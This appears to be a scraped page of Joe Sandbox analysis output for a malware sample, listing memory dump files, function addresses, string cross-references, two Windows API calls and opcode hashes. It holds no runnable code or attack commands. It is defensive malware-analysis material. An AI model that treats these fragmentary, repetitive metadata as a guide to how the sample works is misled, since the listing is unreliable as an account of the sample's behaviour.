Associated: 00000000.00000002.2163497130.0000000006A32000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2163527121.0000000006A36000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a30000_UmotQ1qjLq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bc99dbe7b023636526ad286df606c3e24130d62d3a70f01700ac19ef0028d00e
Instruction ID: b8459591324e0e9a74109ec397200b2f5f51b46c48f8308cb6494a00a173ad09
Opcode Fuzzy Hash: bc99dbe7b023636526ad286df606c3e24130d62d3a70f01700ac19ef0028d00e
Instruction Fuzzy Hash: DCE012B580D659DFDB446F70D4487AD76B0EF14221F110519E592C2980D7354C50CA9B

Function 06A3EB18 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000), ref: 06A3F4C8

Memory Dump Source

Source File: 00000000.00000002.2163561702.0000000006A3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: true

Associated: 00000000.00000002.2163468208.0000000006A30000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2163497130.0000000006A32000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2163527121.0000000006A36000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a30000_UmotQ1qjLq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cb13fe9f9d6bf44ca3cba63369ca15310941a8557b535b9baedeb61c19fd952a
Instruction ID: 870e7e013305d90a884266e65882e848d02c2c2498c7a2f386fa74a7c94c236a
Opcode Fuzzy Hash: cb13fe9f9d6bf44ca3cba63369ca15310941a8557b535b9baedeb61c19fd952a
Instruction Fuzzy Hash: 8DD0927495C75AEFE784BF24D18167EBBF5EB14300F01482DA9C786240D6311860CB5A

Non-executed Functions

Function 00B46DB2 Relevance: 37.8, Strings: 30, Instructions: 257COMMON

Download Yara Rule

Strings

o, xrefs: 00B46E20
k, xrefs: 00B46E30
w, xrefs: 00B46E40
-, xrefs: 00B46DEC
I, xrefs: 00B46EA8
m, xrefs: 00B46E18
;, xrefs: 00B46DCC
i, xrefs: 00B46E28
u, xrefs: 00B46E38
{, xrefs: 00B46E70
M, xrefs: 00B46E98
A, xrefs: 00B46E88
/, xrefs: 00B46DD4
C, xrefs: 00B46E90
O, xrefs: 00B46EA0
g, xrefs: 00B46E00
K, xrefs: 00B46EB0
e, xrefs: 00B46DF8
a, xrefs: 00B46E08
q, xrefs: 00B46E48
s, xrefs: 00B46E50
~, xrefs: 00B46DDC
y, xrefs: 00B46E68
}, xrefs: 00B46E58
c, xrefs: 00B46E10
E, xrefs: 00B46E78
;, xrefs: 00B46DE4
G, xrefs: 00B46E80
8, xrefs: 00B46DC4
J, xrefs: 00B46EAC

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: -$/$8$;$;$A$C$E$G$I$J$K$M$O$a$c$e$g$i$k$m$o$q$s$u$w$y${$}$~
API String ID: 0-1589385449
Opcode ID: eefcd15d2370176f76bb050e62f12cdad099ac0f5c5fb4cef9f7b5126c6cc3c5
Instruction ID: 8d16c5586f90b03bbd465ea8832f57965955202f5066ecb4282884f1c03b1cdd
Opcode Fuzzy Hash: eefcd15d2370176f76bb050e62f12cdad099ac0f5c5fb4cef9f7b5126c6cc3c5
Instruction Fuzzy Hash: 1DB1A2216087D18ED726CE3C88883467F911B66224F1D83E9D8F99F3DBC6A9C946C365

Function 00B1ED75 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 701COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(?), ref: 00B1F4B9

Strings

j, xrefs: 00B1F231
7, xrefs: 00B1EF5D
2, xrefs: 00B1F2F2
V, xrefs: 00B1F302
H, xrefs: 00B1F081
9, xrefs: 00B1F3BD
H, xrefs: 00B1EEFE
v, xrefs: 00B1F1C4

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2$7$9$H$H$V$j$v
API String ID: 237503144-1978986865
Opcode ID: b2a5a0e43a00518a4d49230354ea5e66ea87bf6e2506c1f61bf8610298984ec7
Instruction ID: 4897742027678fefd4221d28efe5f7f6ddaa755af0c71757760a9f38bf7b4b2d
Opcode Fuzzy Hash: b2a5a0e43a00518a4d49230354ea5e66ea87bf6e2506c1f61bf8610298984ec7
Instruction Fuzzy Hash: B152703250C7918BD3249B3884553AFBBE1ABD9320F598EAED8E9D7382D6748941C743

Function 00B211E9 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 499COMMON

Download Yara Rule

Strings

u, xrefs: 00B215C5
?, xrefs: 00B213E9
f, xrefs: 00B2175C
(, xrefs: 00B216CF
}, xrefs: 00B21535

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: ($?$f$u$}
API String ID: 0-3561895482
Opcode ID: 231e3548e9d369dfcb8955901de2fe60528b0b6945bd47cb1c26b5c2e9977ebf
Instruction ID: 944f791d7e215172803e531c523a6a15a76510692d0339d56d0c6735df52ea62
Opcode Fuzzy Hash: 231e3548e9d369dfcb8955901de2fe60528b0b6945bd47cb1c26b5c2e9977ebf
Instruction Fuzzy Hash: 76128171A0C7908BC324DF38D4813AEBBE1ABE5310F598EAEE5DD97391D63489418B43

Function 00B19140 Relevance: 10.4, Strings: 8, Instructions: 415COMMON

Download Yara Rule

Strings

EW4, xrefs: 00B192F1
O!);, xrefs: 00B19165
2&!w, xrefs: 00B1915D
T##", xrefs: 00B1940E
yt, xrefs: 00B1919D
T##", xrefs: 00B19512
IIMC, xrefs: 00B19266
uP, xrefs: 00B19286

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: 2&!w$EW4$IIMC$O!);$T##"$T##"$uP$yt
API String ID: 0-2143932533
Opcode ID: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
Instruction ID: b459bf552535ecf370d38ebed3a8b0f4e9f3dd54979e6321ccd8bb6890070db8
Opcode Fuzzy Hash: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
Instruction Fuzzy Hash: 11C1267160C3D18AD725CF3984603ABBFE2EB93304F5889ADE4D59B382D239C54AC756

Function 00B48040 Relevance: 10.2, Strings: 8, Instructions: 194COMMON

Download Yara Rule

Strings

b, xrefs: 00B48166
T, xrefs: 00B4816B
R, xrefs: 00B48161
%, xrefs: 00B480F1
W, xrefs: 00B4815C
&, xrefs: 00B480E2
<, xrefs: 00B480E7
9, xrefs: 00B480EC

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
